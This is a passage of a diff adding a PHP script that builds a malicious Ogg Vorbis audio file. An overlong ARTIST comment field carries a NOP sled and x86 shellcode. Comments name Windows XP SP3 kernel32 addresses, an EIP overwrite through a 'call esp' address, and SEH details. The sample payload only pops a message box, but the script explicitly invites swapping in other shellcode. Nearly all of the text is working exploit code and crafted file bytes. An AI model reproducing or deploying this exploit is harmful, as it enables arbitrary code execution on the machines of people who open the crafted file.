+"\x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01";
+
+$_frgmnt2 =
+"OggS".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07".
+"\x00\x00\x01\x00\x00\x00".
+"\x00\x00\x00\x00". //set crc to 0, after calculate the real crc
+"\x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00".
+"\x00Xiph.Org\x20libVor".
+"bis\x20I\x2020040629\x03\x00".
+"\x00\x00\x07\x20\x00\x00".
+"ARTIST=";
+
+$payload_len=8192;
+
+//msg box shellcode saying "hey" ...
+//replace with your own, the script recalculates the CRC checksum
+$scode =
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a".
+"\xbb\x7b\x1d\x80\x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll xpsp3
+"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50".
+"\xbb\x30\xae\x80\x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll
+"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51".
+"\x51\x52\xff\xd0\x31\xd2\x50".
+"\xb8\xfa\xca\x81\x7c". //ExitProcess at 0x7c81cafa in kernel32.dll
+"\xff\xd0\xe8\xc4\xff".
+"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".
+"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".
+"\xff\x48\x65\x79\x4e";
+
+$_boom=str_repeat("\x90",2048 - strlen($scode)).$scode.
+"\x67\x86\x86\x7c". //eip -> 0x7C868667 call esp kernel32.dll
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
+"\x83\xec\x7f". // sub esp,07f
+"\x83\xec\x7f". //..
+"\x83\xec\x7f". //..
+"\x83\xec\x7f". //..
+"\x83\xec\x7f". //..
+"\xff\xd4". //call esp
+"\x90\x90\x90".
+"\x00\x00\x00\x00";//if replaced with non-zero chars, overwrites seh ... do not touch
+
+$_frgmnt2.=$_boom."\x90\x90\x90\x90\x90\x90\x90\x90".str_repeat("\x90",$payload_len - strlen($_boom) - 8);
+$_frgmnt2.="\x0a\x20\x00\x00".
+"PERFORMER=";
+$_frgmnt2.=str_repeat("\x90",$payload_len);
+$_frgmnt2.="\x09\x00\x00\x00".
+"DATE=2009".
+"\x01\x05".
+"vorbis".
+"\x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0".
+"\x90\x55\x00\x00\x10\x00\x00".
+"\x60\x24\x29\x0e\x93\x66\x49\x29\xa5".
+"\x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94".
+"\x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20".
+"\x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce".
+"\x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51". +"\xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25". +"\x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21". +"\x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7". +"\x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4". +"\x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4". +"\xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7". +"\x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00". +"\x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6". +"\x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00". +"\x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2". +"\x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d". +"\x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59". +"\xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18". +"\x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20". +"\x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03". +"\x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92". +"\xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c". +"\xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00". +"\x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a". +"\xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65". +"\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59". +"\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xc8\x2a". +"\x00\x40\x02\x00\x40\xc7\x71\x1c\xc7\x71\x24\x45\x52\x24\xc7\x72". +"\x2c\x07\x08\x0d\x59\x05\x00\xc8\x00\x00\x08\x00\x40\x52\x2c\xc5". +"\x72\x34\x47\x73\x34\xc7\x73\x3c\xc7\x73\x3c\x47\x74\x44\xc9\x94". +"\x4c\xcd\xf4\x4c\x0f\x08\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00". +"\x00\x00\x00\x40\x31\x1c\xc5\x71\x1c\xc9\xd1\x24\x4f\x52\x2d\xd3". 
+"\x72\x35\x57\x73\x3d\xd7\x73\x4d\xd7\x75\x5d\x57\x55\x55\x55\x55". +"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55". +"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x81\xd0". +"\x90\x55\x00\x00\x04\x00\x00\x21\x9d\x66\x96\x6a\x80\x08\x33\x90". +"\x61\x20\x34\x64\x15\x00\x80\x00\x00\x00\x18\xa1\x08\x43\x0c\x08". +"\x0d\x59\x05\x00\x00\x04\x00\x00\x88\xa1\xe4\x20\x9a\xd0\x9a\xf3". +"\xcd\x39\x0e\x9a\xe5\xa0\xa9\x14\x9b\xd3\xc1\x89\x54\x9b\x27\xb9". +"\xa9\x98\x9b\x73\xce\x39\xe7\x9c\x6c\xce\x19\xe3\x9c\x73\xce\x29". +"\xca\x99\xc5\xa0\x99\xd0\x9a\x73\xce\x49\x0c\x9a\xa5\xa0\x99\xd0". +"\x9a\x73\xce\x79\x12\x9b\x07\xad\xa9\xd2\x9a\x73\xce\x19\xe7\x9c". +"\x0e\xc6\x19\x61\x9c\x73\xce\x69\xd2\x9a\x07\xa9\xd9\x58\x9b\x73". +"\xce\x59\xd0\x9a\xe6\xa8\xb9\x14\x9b\x73\xce\x89\x94\x9b\x27\xb5". +"\xb9\x54\x9b\x73\xce\x39\xe7\x9c\x73\xce\x39\xe7\x9c\x73\xce\xa9". +"\x5e\x9c\xce\xc1\x39\xe1\x9c\x73\xce\x89\xda\x9b\x6b\xb9\x09\x5d". +"\x9c\x73\xce\xf9\x64\x9c\xee\xcd\x09\xe1\x9c\x73\xce\x39\xe7\x9c". +"\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x40\x00\x00". +"\x04\x61\xd8\x18\xc6\x9d\x82\x20\x7d\x8e\x06\x62\x14\x21\xa6\x21". +"\x93\x1e\x74\x8f\x0e\x93\xa0\x31\xc8\x29\xa4\x1e\x8d\x8e\x46\x4a". +"\xa9\x83\x50\x52\x19\x27\xa5\x74\x82\xd0\x90\x55\x00\x00\x20\x00". +"\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21". +"\x86\x18\x62\x88\x21\xa7\x9c\x72\x0a\x2a\xa8\xa4\x92\x8a\x2a\xca". +"\x28\xb3\xcc\x32\xcb\x2c\xb3\xcc\x32\xcb\xac\xc3\xce\x3a\xeb\xb0". +"\xc3\x10\x43\x0c\x31\xb4\xd2\x4a\x2c\x35\xd5\x56\x63\x8d\xb5\xe6". +"\x9e\x73\xae\x39\x48\x6b\xa5\xb5\xd6\x5a\x2b\xa5\x94\x52\x4a\x29". +"\xa5\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19". +"\x85\x14\x52\x48\x21\x86\x98\x72\xca\x29\xa7\xa0\x82\x0a\x08\x0d". +"\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\xf0\x24\xcf\x11\x1d\xd1". +"\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xcf\xf1\x1c\x51\x12". 
+"\x25\x51\x12\x25\xd1\x32\x2d\x53\x33\x3d\x55\x54\x55\x57\x76\x6d". +"\x59\x97\x75\xdb\xb7\x85\x5d\xd8\x75\xdf\xd7\x7d\xdf\xd7\x8d\x5f". +"\x17\x86\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59". +"\x96\x65\x09\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84". +"\x14\x52\x48\x21\x85\x94\x62\x8c\x31\xc7\x9c\x83\x4e\x42\x09\x81". +"\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x47\x71\x14\xc7". +"\x91\x1c\xc9\x91\x24\x4b\xb2\x24\x4d\xd2\x2c\xcd\xf2\x34\x4f\xf3". +"\x34\xd1\x13\x45\x51\x34\x4d\x53\x15\x5d\xd1\x15\x75\xd3\x16\x65". +"\x53\x36\x5d\xd3\x35\x65\xd3\x55\x65\xd5\x76\x65\xd9\xb6\x65\x5b". +"\xb7\x7d\x59\xb6\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7". +"\x7d\xdf\xd7\x75\x20\x34\x64\x15\x00\x20\x01\x00\xa0\x23\x39\x92". +"\x22\x29\x92\x22\x39\x8e\xe3\x48\x92\x04\x84\x86\xac\x02\x00\x64". +"\x00\x00\x04\x00\xa0\x28\x8e\xe2\x38\x8e\x23\x49\x92\x24\x59\x92". +"\x26\x79\x96\x67\x89\x9a\xa9\x99\x9e\xe9\xa9\xa2\x0a\x84\x86\xac". +"\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xa0\x68\x8a\xa7\x98". +"\x8a\xa7\x88\x8a\xe7\x88\x8e\x28\x89\x96\x69\x89\x9a\xaa\xb9\xa2". +"\x6c\xca\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb". +"\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba". +"\xae\xeb\xba\xae\xeb\xba\x40\x68\xc8\x2a\x00\x40\x02\x00\x40\x47". +"\x72\x24\x47\x72\x24\x45\x52\x24\x45\x72\x24\x07\x08\x0d\x59\x05". +"\x00\xc8\x00\x00\x08\x00\xc0\x31\x1c\x43\x52\x24\xc7\xb2\x2c\x4d". +"\xf3\x34\x4f\xf3\x34\xd1\x13\x3d\xd1\x33\x3d\x55\x74\x45\x17\x08". +"\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\xc0\x90\x0c". +"\x4b\xb1\x1c\xcd\xd1\x24\x51\x52\x2d\xd5\x52\x35\xd5\x52\x2d\x55". +"\x54\x3d\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55". +"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55". +"\x55\x55\x55\xd5\x34\x4d\xd3\x34\x81\xd0\x90\x95\x00\x00\x19\x00". +"\x00\xe4\xa4\xa6\xd4\x7a\x0e\x12\x62\x90\x39\x89\x41\x68\x08\x49". 
+"\xc4\x1c\xc5\x5c\x3a\xe9\x9c\xa3\x5c\x8c\x87\x90\x23\x46\x49\xed". +"\x21\x53\xcc\x10\x04\xb5\x98\xd0\x49\x85\x14\xd4\xe2\x5a\x6a\x1d". +"\x73\x54\x8b\x8d\xad\x64\x48\x41\x2d\xb6\xc6\x52\x21\xe5\xa8\x07". +"\x42\x43\x56\x08\x00\xa1\x19\x00\x0e\xc7\x01\x1c\x4d\x03\x1c\x4b". +"\x03\x00\x00\x00\x00\x00\x00\x00\x49\xd3\x00\x4d\x14\x01\xcd\x13". +"\x01\x00\x00\x00\x00\x00\x00\xc0\xd1\x34\x40\x13\x3d\x40\x13\x45". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00". +"\x00\x00\x00\x00\x4d\x14\x01\xd1\x54\x01\xd1\x34\x01\x00\x00\x00". +"\x00\x00\x00\x40\x13\x45\xc0\x33\x45\x40\x34\x55\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00\x00\x00\x00\x00". +"\x4d\x14\x01\x51\x35\x01\x4f\x34\x01\x00\x00\x00\x00\x00\x00\x40". +"\x13\x45\x40\x34\x4d\x40\x54\x4d\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01". +"\x00\x00\x01\x0e\x00\x00\x01\x16\x42\xa1\x21\x2b\x02\x80\x38\x01". +"\x00\x87\xe3\x40\x92\x20\x49\xf0\x34\x80\x63\x59\xf0\x3c\x78\x1a". +"\x4c\x13\xe0\x58\x16\x3c\x0f\x9a\x07\xd3\x04\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x40\xf2\x34\x78\x1e\x3c\x0f\xa6\x09\x90\x34\x0f". +"\x9e\x07\xcf\x83\x69\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20". +"\x79\x1e\x3c\x0f\x9e\x07\xd3\x04\x48\x9e\x07\xcf\x83\xe7\xc1\x34". +"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x4c\x13\xa6\x09\xd1". +"\x84\x6a\x02\x3c\xd3\x84\x69\xc2\x34\x61\xaa\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b". +"\x02\x80\x38\x01\x00\x87\xa3\x48\x12\x00\x00\x38\x92\x64\x59\x00". +"\x00\xa0\x48\x92\x65\x01\x00\x80\x65\x59\x9e\x07\x00\x00\x92\x65". +"\x79\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21". +"\x2b\x01\x80\x28\x00\x00\x87\xa2\x58\x16\x70\x1c\xcb\x02\x8e\x63". +"\x59\x40\x92\x2c\x0b\x60\x59\x00\x4d\x03\x78\x1a\x40\x14\x01\x80". +"\x00\x00\x80\x02\x07\x00\x80\x00\x1b\x34\x25\x16\x07\x28\x34\x64". +"\x25\x00\x10\x05\x00\xe0\x70\x14\xcb\xd2\x34\x51\xe4\x38\x96\xa5". +"\x69\xa2\xc8\x71\x2c\x4b\xd3\x44\x91\x65\x69\x9a\xa6\x89\x22\x34". +"\x4b\xd3\x44\x11\x9e\xe7\x79\xa6\x09\xcf\xf3\x3c\xd3\x84\x28\x8a". +"\xa2\x69\x02\x51\x34\x4d\x01\x00\x00\x05\x0e\x00\x00\x01\x36\x68". +"\x4a\x2c\x0e\x50\x68\xc8\x4a\x00\x20\x24\x00\xc0\xe1\x38\x96\xe5". +"\x79\xa2\x28\x8a\xa6\x69\x9a\xaa\xca\x71\x2c\xcb\xf3\x44\x51\x14". 
+"\x4d\x53\x55\x5d\x97\xe3\x58\x96\xe7\x89\xa2\x28\x9a\xa6\xaa\xba". +"\x2e\xcb\xd2\x34\xcf\x13\x45\x51\x34\x4d\x55\x75\x5d\x68\x9a\xe7". +"\x89\xa2\x28\x9a\xa6\xaa\xba\x2e\x34\x4d\x14\x4d\xd3\x34\x55\x55". +"\x55\x5d\x17\x9a\xe6\x89\xa6\x69\x9a\xaa\xaa\xaa\xae\x0b\xcf\x13". +"\x45\xd3\x34\x4d\x55\x75\x5d\xd7\x05\xa2\x68\x9a\xa6\xa9\xaa\xae". +"\xeb\xba\x40\x14\x4d\xd3\x34\x55\xd5\x75\x5d\x17\x88\xa2\x68\x9a". +"\xa6\xaa\xba\xae\xeb\x02\xd3\x34\x4d\x55\x55\x5d\xd7\x95\x65\x80". +"\x69\xaa\xaa\xaa\xba\xae\x2c\x03\x54\x55\x55\x5d\xd7\x95\x65\x19". +"\xa0\xaa\xaa\xea\xba\xae\x2b\xcb\x00\xd7\x75\x5d\xd9\x95\x65\x59". +"\x06\xe0\xba\xae\x2b\xcb\xb2\x2c\x00\x00\xe0\xc0\x01\x00\x20\xc0". +"\x08\x3a\xc9\xa8\xb2\x08\x1b\x4d\xb8\xf0\x00\x14\x1a\xb2\x22\x00". +"\x88\x02\x00\x00\x8c\x61\x4a\x31\xa5\x0c\x63\x12\x42\x0a\xa1\x61". +"\x4c\x42\x48\x21\x64\x52\x52\x2a\x29\xa5\x0a\x42\x2a\x25\x95\x52". +"\x41\x48\xa5\xa4\x52\x32\x4a\x2d\xa5\x96\x52\x05\x21\x95\x92\x4a". +"\xa9\x20\xa4\x52\x52\x29\x05\x00\x80\x1d\x38\x00\x80\x1d\x58\x08". +"\x85\x86\xac\x04\x00\xf2\x00\x00\x08\x63\x94\x62\xcc\x39\xe7\x24". +"\x42\x4a\x31\xe6\x9c\x73\x12\x21\xa5\x18\x73\xce\x39\xa9\x14\x63". +"\xce\x39\xe7\x9c\x94\x92\x31\xe7\x9c\x73\x4e\x4a\xc9\x98\x73\xce". +"\x39\x27\xa5\x64\xcc\x39\xe7\x9c\x93\x52\x3a\xe7\x9c\x73\x0e\x4a". +"\x29\xa5\x74\xce\x39\xe7\xa4\x94\x52\x42\xe8\x9c\x73\x52\x4a\x29". +"\x9d\x73\xce\x39\x01\x00\x40\x05\x0e\x00\x00\x01\x36\x8a\x6c\x4e". +"\x30\x12\x54\x68\xc8\x4a\x00\x20\x15\x00\xc0\xe0\x38\x96\xa5\x69". +"\x9e\x27\x8a\xa6\x69\x49\x92\xa6\x79\x9e\x27\x9a\xa6\x69\x6a\x92". +"\xa4\x69\x9e\x27\x8a\xa6\x69\x9a\x3c\xcf\xf3\x44\x51\x14\x4d\x53". +"\x55\x79\x9e\xe7\x89\xa2\x28\x9a\xa6\xaa\x72\x5d\x51\x14\x4d\xd3". +"\x34\x4d\x55\x25\xcb\xa2\x28\x8a\xa6\xa9\xaa\xaa\x0a\xd3\x34\x4d". +"\xd3\x54\x55\x55\x85\x69\x9a\xa6\x69\xaa\xaa\xeb\xc2\xb6\x55\x55". +"\x55\x5d\xd7\x75\x61\xdb\xaa\xaa\xaa\xae\xeb\xba\xc0\x75\x5d\xd7". 
+"\x75\x65\x19\xb8\xae\xeb\xba\xae\x2c\x0b\x00\x00\x4f\x70\x00\x00". +"\x2a\xb0\x61\x75\x84\x93\xa2\xb1\xc0\x42\x43\x56\x02\x00\x19\x00". +"\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xa4\x10\x42\x48\x29\x85". +"\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b\x01". +"\x80\x70\x00\x00\x80\x10\x8c\x31\xc6\x18\x63\x8c\x31\x36\x8c\x61". +"\x8c\x31\xc6\x18\x63\x8c\x31\x71\x0a\x63\x8c\x31\xc6\x18\x63\x8c". +"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31". +"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6". +"\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18". +"\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63". +"\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c". +"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31". +"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\xd8\x5a\x6b\xad\xb5". +"\x56\x00\x18\xce\x85\x03\x40\x59\x84\x8d\x33\xac\x24\x9d\x15\x8e". +"\x06\x17\x1a\xb2\x12\x00\x08\x09\x00\x00\x8c\x41\x88\x31\xe8\x24". +"\x94\x92\x4a\x4a\x15\x42\x8c\x39\x28\x25\x95\x96\x5a\x8a\xad\x42". +"\x88\x31\x08\xa5\xa4\xd4\x5a\x6c\x31\x16\xcf\x39\x07\xa1\xa4\x94". +"\x5a\x8a\x29\xb6\xe2\x39\xe7\xa4\xa4\xd4\x5a\x8c\x31\xc6\x5a\x5c". +"\x0b\x21\xa5\x94\x5a\x8b\x2d\xb6\x18\x9b\x6c\x21\xa4\x94\x52\x6b". +"\x31\xc6\x5a\x63\x33\x4a\xb5\x94\x5a\x8b\x31\xc6\x18\x6b\x2c\x4a". +"\xb9\x94\x52\x6b\xb1\xc5\x18\x6b\x8d\x45\x28\x9b\x5b\x6b\x31\xc6". +"\x5a\x6b\xad\x35\x29\xe5\x73\x4b\xb1\xd5\x5a\x63\xac\xb5\x26\xa3". +"\x8c\x92\x31\xc6\x5a\x6b\xac\xb5\xd6\x22\x94\x52\x32\xc6\x14\x53". +"\xac\xb5\xd6\x9a\x84\x30\xc6\xf7\x18\x63\xac\x31\xe7\x5a\x93\x12". +"\xc2\xf8\x1e\x53\x2d\xb1\xd5\x5a\x6b\x52\x4a\x29\x23\x64\x8d\xa9". +"\xc6\x5a\x73\x4e\x4a\x09\x65\x8c\x8d\x2d\xd5\x94\x73\xce\x05\x00". +"\x40\x3d\x38\x00\x40\x25\x18\x41\x27\x19\x55\x16\x61\xa3\x09\x17". +"\x1e\x80\x42\x43\x56\x02\x00\xb9\x01\x00\x08\x42\x4a\x31\xc6\x98". 
+"\x73\xce\x39\xe7\x9c\x73\x0e\x52\xa4\x18\x73\xcc\x39\xe7\x20\x84". +"\x10\x42\x08\x21\xa4\x08\x31\xc6\x98\x73\xce\x41\x08\x21\x84\x10". +"\x42\x48\x19\x63\xcc\x39\xe7\x20\x84\x10\x42\x08\xa1\x84\x92\x52". +"\xca\x98\x73\xce\x41\x08\x21\x84\x52\x4a\x29\x25\xa5\xd4\x39\xe7". +"\x20\x84\x10\x42\x28\xa5\x94\x52\x4a\x4a\xa9\x73\xce\x41\x08\x21". +"\x84\x52\x4a\x29\xa5\x94\x94\x52\x08\x21\x84\x10\x42\x08\xa5\x94". +"\x52\x4a\x29\x29\xa5\x94\x42\x08\x21\x84\x12\x4a\x29\xa5\x94\x52". +"\x52\x4a\x29\x85\x10\x42\x08\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52". +"\x0a\x21\x84\x10\x4a\x29\xa5\x94\x52\x4a\x49\x29\xa5\x14\x42\x09". +"\xa5\x94\x52\x4a\x29\xa5\x94\x92\x52\x4a\x29\xa5\x10\x4a\x29\xa5". +"\x94\x52\x4a\x29\x25\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94". +"\x52\x4a\x4a\x29\xa5\x94\x4a\x29\xa5\x94\x52\x4a\x29\xa5\x94\x94". +"\x52\x4a\x29\x95\x52\x4a\x29\xa5\x94\x52\x4a\x29\x29\xa5\x94\x52". 